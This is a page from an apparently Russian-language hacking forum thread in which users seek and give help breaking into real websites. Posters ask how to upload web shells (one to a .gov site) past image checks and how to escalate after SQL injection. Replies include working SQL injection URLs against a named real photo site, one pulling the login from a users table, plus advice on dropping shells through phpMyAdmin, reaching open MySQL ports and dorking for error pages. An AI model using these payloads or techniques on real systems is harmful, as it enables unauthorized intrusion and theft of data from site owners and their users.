Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. fker

    fker Member

    Joined:
    26 Nov 2008
    Messages:
    135
    Likes Received:
    64
    Reputations:
    -1
    заливка шелла cgi

    При заливке шелла возникает ошибка :
    Code:
    Can't call method "getBounds" on an undefined value at ../../MODULES/MWGD.pm line 40, <fh00001nedelya1x.jpg.cgi> line 87.
    
    как я понял, это ошибка при проверки картинки... Можно ли как-то это ограничение обойти? И будет ли выполняться cgi-сценарий в папке site.gov/photos/
    если все скрипты лежат в site.gov/cgi-bin/ ?
     
  2. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    попробовать залить gif.
    нет, если это дополнительно не оговорено в .htaccess

    ps если резюмировать 2 вопроса, то можно сказать что заливка шелла с неисполняемым расширением, без возможности залить свой .htaccess , или без LFI/code execution - занятие бесполезное.
     
    1 person likes this.
  3. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    Никто не подскажит PHP скрипт для работы с файлами! А то уже 2 заюзал никак не могу папку скачать она весить гиг прмерно! Виснет скрипт и все!

    Что делать?
     
  4. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    заархивировать и скачать(накрайняк tar без сжатия).
     
  5. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1

    А подскажите какой командой?
     
  6. neverdie

    neverdie New Member

    Joined:
    20 Mar 2009
    Messages:
    4
    Likes Received:
    3
    Reputations:
    0
    народ, подскажьте плз как запускать скрипты например перловский niko просто я запускаю через свой компилятор и выдаёт ошибку на третьей линии просто я не могу найти админку одного сайта, юзал телепорт про не помогло....
     
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    neverdie проблема не в твоем компиляторе, а ая думаю в самом скрипте..
     
  8. VITАL

    VITАL Elder - Старейшина

    Joined:
    19 Aug 2008
    Messages:
    1
    Likes Received:
    25
    Reputations:
    10
    нету вывода чтоли? пятая ветка..
     
  9. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    так

    Code:
    http://www.photodom.com/catalog.php?page=2&id=17,117)+and+ascii(lower(substring((SELECT+login+from+users+LIMIT+1),1,1)))%3E1%23&page025=&action=
    с пасами лень искать
     
  10. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    какая ошибка? случайно не связана с https?
    если так и при этом тебя этот протокол не интересует, то нужно эту строку закомментировать или удалить.
     
  11. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    Code:
    http://www.photodom.com/fullscreen.php?fotoid=-1291553+union+select+1,2,3,4,5,6,7,8,9,0,concat(%27%22%3E%3Ch1%3E%27,version()),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3+--
     
    2 people like this.
  12. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    Всем приятного времени суток

    хочу залить на сайт шелл , а kak это сделать не знаю вообще .
    мост , где то можно про это почитать или объясните на пальцах , луче наверно в личку уже тогда.
     
  13. fker

    fker Member

    Joined:
    26 Nov 2008
    Messages:
    135
    Likes Received:
    64
    Reputations:
    -1
    непохек=(

    В общем такая ситуация: на сервере на многих сайтах скуль иньекции, есть доступ к нескольким админкам, шелл через них не получаеццо залить, на одном поддомене бд запущена от имени root, file_priv - Y, пороли из mysql.user есть, пробовал читать разные конфиги - не читаются, тока получается etc/passwd....shadow тоже не читается, что странно ведь бд запущена от рута. По ssh ни один из добытых пассов не подошел(. Подкиньте пожалуйста свежую идейку...
    на серве есть(взял из passwd):
    Secure FTP
    Novell Customer Center
    PostgreSQL Server
    OpenLDAP
    SSH
    Может можно прочитать логи подключения по фтп или ssh, подкиньте стандартные пути плз..


    и еще кофе заканчиваеццо(
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    https://forum.antichat.ru/thread49775.html
     
  15. fker

    fker Member

    Joined:
    26 Nov 2008
    Messages:
    135
    Likes Received:
    64
    Reputations:
    -1
    2 Pashkela именно от туда и брал пути....там нет от Secure FTP и ССШ..
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    http://vsftpd.beasts.org/

    ssh:

    /var/log/auth.log
     
    #6476 Pashkela, 9 Apr 2009
    Last edited: 9 Apr 2009
  17. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    fker
    1 Если маджик квот офф, зачем тебе конфиги? ищи папку на запись и лей шелл. Даже если ON залить можно при двойном запросе.

    2 Ищи Phpmyadmin и лей через него, если база под рутом, то пасс думаю вытащишь от неё
    Это не тот рут, ничего странного :)
     
  18. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Исчи phpmyadmin или конекться на 3306 порт-если открыт..и лей шелл где FILE PRIV Y-если ты говоришь что пароли у тебя есть...А НЕ ХЕШИ..
    И почему ты думаешь что если в мускуле лазишь под логином рута ...должен читаться /etc/shadow?
     
  19. fker

    fker Member

    Joined:
    26 Nov 2008
    Messages:
    135
    Likes Received:
    64
    Reputations:
    -1
    Дириктории на запись то есть, а вот полных путей нет, magic quots - off...
    именно пароли есть..
    а подключение эт хорошая мысль, сейчас попробую, хотя для удаленных пользователей может быть закрыто..
     
    #6479 fker, 9 Apr 2009
    Last edited: 9 Apr 2009
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    гугл
    warning or error site:ТВОЙ_САЙТ

    если сайтов несколько, то все прочекай, частенько помогает.
     
Thread Status:
Not open for further replies.